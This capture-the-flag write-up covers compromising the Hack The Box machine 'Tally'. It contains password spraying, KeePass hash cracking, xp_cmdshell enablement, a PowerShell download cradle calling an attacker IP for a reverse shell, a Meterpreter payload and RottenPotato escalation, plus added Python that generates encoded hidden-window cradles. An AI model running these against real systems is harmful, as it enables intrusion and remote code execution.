Hack The Box-Tally Writeup


OS: Windows

IP: 10.10.10.59

Enumeration:

Today's write-up is for the machine named "Tally". We begin with an nmap scan to list open ports and services and see numerous ports open: 21/tcp, 80/tcp, 81/tcp, 135/tcp, 139/tcp, 445/tcp, 808/tcp and 1433/tcp. We notice that port 80 is running SharePoint: 80/tcp open http Microsoft IIS httpd 10.0 |_http-generator: Microsoft SharePoint.



Upon visiting the site by IP we are redirected to a SharePoint site.



Brute-forcing the SharePoint site with gobuster turns up a number of directories; the one of interest is /shared documents/forms/allitems.aspx. Browsing to the default _layouts/viewlsts.aspx page also leads you there, and under Documents we find a file with FTP details.





We have a password and hostname from the FTP details but no username. The Finance section of the SharePoint site lists a few usernames that we will try: Sarah, Tim, Rahul and ftp_user.


We try the password against those usernames over FTP, and ftp_user works. We then navigate around the numerous files on the server and find nothing interesting, until, going back to the Users directory, under the user Tim we find a KeePass database file (.kdbx), which typically stores passwords, and download it. For easier navigation you can also use FileZilla.
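The username check above, scripted, as an added example that is not part of the original write-up: one recovered password is tried against the short list of names taken from the SharePoint Finance page. The host and names are from the page; the password is a placeholder (the write-up does not reproduce it), and the injectable `login` parameter is an assumption made so the logic can be exercised without a live server.

```python
import ftplib

# Candidate usernames the write-up pulled from the SharePoint Finance page.
USERNAMES = ["Sarah", "Tim", "Rahul", "ftp_user"]
HOST = "10.10.10.59"
PASSWORD = "<password from the SharePoint document>"  # placeholder, not reproduced here


def ftp_login(host, user, password, port=21, timeout=5):
    """Return True if the server accepts user/password, False on a 5xx reply
    (530 Login incorrect). Network errors propagate to the caller."""
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        ftp.login(user, password)
        return True
    except ftplib.error_perm:
        return False
    finally:
        ftp.close()  # safe even if connect() never succeeded


def spray(host, usernames, password, login=ftp_login):
    """Try `password` against every name in `usernames`; return the names that worked.
    `login` is injectable (assumption for offline testing) so the loop can run
    against a fake instead of a real FTP server."""
    hits = []
    for user in usernames:
        try:
            ok = login(host, user, password)
        except ftplib.all_errors as exc:  # socket errors, EOF, 4xx replies
            print(f"[!] {user}: {exc}")
            continue
        print(f"[{'+' if ok else '-'}] {user}")
        if ok:
            hits.append(user)
    return hits


if __name__ == "__main__":
    print("valid:", spray(HOST, USERNAMES, PASSWORD))
```

The list is deliberately short: the target is a Windows host, so failed FTP logins are failed Windows logons and count toward any account lockout policy.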





We then use keepass2john to extract a crackable hash from the KeePass database. Note that keepass2john prefixes the hash with the file name and a colon; strip that prefix (or pass --username to hashcat) before cracking. Searching hashcat's example_hashes page for the keepass2 hash format ($keepass$*2*6000*...) shows that the hash mode is 13400.





Next we run the hash through hashcat with mode 13400 and get the password: simplementeyo



We then use Tim's password, simplementeyo, to open the database with KeePassX. We find three entries; the useful one is Title: TALLY ACC SHARE, Username: Finance, Password: Acc0unting. We use these credentials to connect to SMB:



I also used smbmap from GitHub (https://github.com/ShawnDEvans/smbmap.git). After going through all folders in the SMB shares, I found an interesting file under ACCT\zz_Archived\SQL named conn-info.txt, which I downloaded. Inside this file I found MSSQL database login credentials. Alternatively you can run:

smbclient \\\\10.10.10.59\\ACCT -U Finance

or mount the share:

sudo mount -t cifs //10.10.10.59/ACCT /mnt/TEMP -o user=Finance,password=Acc0unting,vers=2.0



We connect to MSSQL with the credentials found and check whether we can use xp_cmdshell. Once it works, whoami shows that commands run as the user sarah, and whoami /priv shows that SeImpersonatePrivilege is enabled.

To test it run:

1> EXEC xp_cmdshell 'whoami'

2> go

If the component is disabled, turn it on (this requires the sysadmin role on the instance):

1> EXEC SP_CONFIGURE N'show advanced options', 1

2> go

The server replies "Run the RECONFIGURE statement to install.", so run it:

1> RECONFIGURE

2> go

1> EXEC SP_CONFIGURE N'xp_cmdshell', 1

2> go

Again the server asks for the RECONFIGURE statement:

1> RECONFIGURE

2> go

Enumeration:

With xp_cmdshell on, we enumerate the host:

1> xp_cmdshell 'whoami'

2> go

1> xp_cmdshell 'whoami /priv'

2> go

1> xp_cmdshell 'dir C:\'

2> go

1> xp_cmdshell 'cd C:\ & systeminfo'

2> go

To see whether AV is enabled, read the note on Sarah's desktop:

1> xp_cmdshell 'type C:\Users\Sarah\Desktop\todo.txt'

2> go



To get a shell, I used Nishang's Invoke-PowerShellTcp.ps1 and set up an nc listener on the port configured in the script. We then use xp_cmdshell to fetch it: (xp_cmdshell "powershell (New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/rev-9000.ps1')"). Note that DownloadString alone only downloads the script; it needs to be wrapped in IEX(...) to execute. In any case the call is blocked "because this component is turned off as part of the security configuration for this server", which is SQL Server's message for xp_cmdshell being disabled, so it has to be re-enabled with sp_configure before each attempt.
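An added example (not code from the write-up) that serves both the sp_configure sequence above and the blocked download cradle: it generates the T-SQL batch that re-enables xp_cmdshell and runs a command, escapes the command for the single-quoted T-SQL literal, and, for the PowerShell cradle, switches to -EncodedCommand so the nested quotes disappear entirely. The sysadmin check, the function names and the IEX-wrapped cradle are assumptions; the attacker URL is the one from the write-up.

```python
import base64


def tsql_string(s: str) -> str:
    """Quote s as a T-SQL string literal: single quotes inside are doubled."""
    return "'" + s.replace("'", "''") + "'"


def encoded_powershell(script: str) -> str:
    """Wrap a PowerShell script in a powershell.exe -EncodedCommand call.
    -EncodedCommand takes the base64 of the UTF-16LE bytes of the script, so
    the resulting command line contains no quotes at all: nothing to escape
    for cmd.exe (which xp_cmdshell uses) or for the T-SQL literal around it."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "powershell -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand " + b64


def decode_encoded_command(cmdline: str) -> str:
    """Reverse of encoded_powershell (useful when triaging a suspicious command line)."""
    b64 = cmdline.rsplit(" ", 1)[1]
    return base64.b64decode(b64).decode("utf-16-le")


def xp_cmdshell_batch(command: str, enable: bool = True) -> str:
    """Return the T-SQL batch that runs `command` through xp_cmdshell.
    With enable=True it first turns the component on, which is what clears the
    'turned off as part of the security configuration' error. sp_configure
    needs the sysadmin role, so the batch bails out early without it
    (RETURN exits the batch; RAISERROR alone would not)."""
    lines = []
    if enable:
        lines += [
            "IF IS_SRVROLEMEMBER('sysadmin') <> 1 BEGIN "
            "RAISERROR('need sysadmin to reconfigure', 16, 1); RETURN; END",
            "EXEC sp_configure 'show advanced options', 1;",
            "RECONFIGURE;",
            "EXEC sp_configure 'xp_cmdshell', 1;",
            "RECONFIGURE;",
        ]
    lines.append("EXEC master..xp_cmdshell " + tsql_string(command) + ";")
    return "\n".join(lines)


# The write-up's download cradle, with the IEX the original one-liner was missing
# (assumed fix; the listener URL is the one from the write-up).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.19:80/rev-9000.ps1')"

if __name__ == "__main__":
    # Paste the printed batch into the MSSQL client as one batch followed by 'go'.
    print(xp_cmdshell_batch(encoded_powershell(CRADLE)))
```

If the "turned off" error reappears between runs, something on the server is resetting the option; regenerating with enable=True puts the two sp_configure/RECONFIGURE pairs in front of every command so each attempt is self-contained.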



Next we create a msfvenom backdoor, which we upload over FTP into the Intranet directory. We also start a msfconsole listener for the reverse shell.







In a second msfconsole we use auxiliary/admin/mssql/mssql_exec, which runs a command through xp_cmdshell with the MSSQL credentials, to execute our uploaded payload. Running it gives us a Meterpreter session.





PRIV ESCALATION:

For this we load incognito in Meterpreter (it is used to impersonate user tokens). list_tokens -u shows we currently have no useful tokens, but whoami /priv earlier showed SeImpersonatePrivilege, so we use RottenPotato (git clone https://github.com/foxglovesec/RottenPotato.git), which abuses that privilege to obtain a SYSTEM token. We can push rottenpotato.exe to the box over FTP as ftp_user, or upload it straight from the Meterpreter session: upload /root/Desktop/RottenPotato/rottenpotato.exe.

Next we execute the file (execute -Hc -f rottenpotato.exe) and impersonate the SYSTEM token (impersonate_token "NT AUTHORITY\\SYSTEM"), which gives us a shell as NT AUTHORITY\SYSTEM.

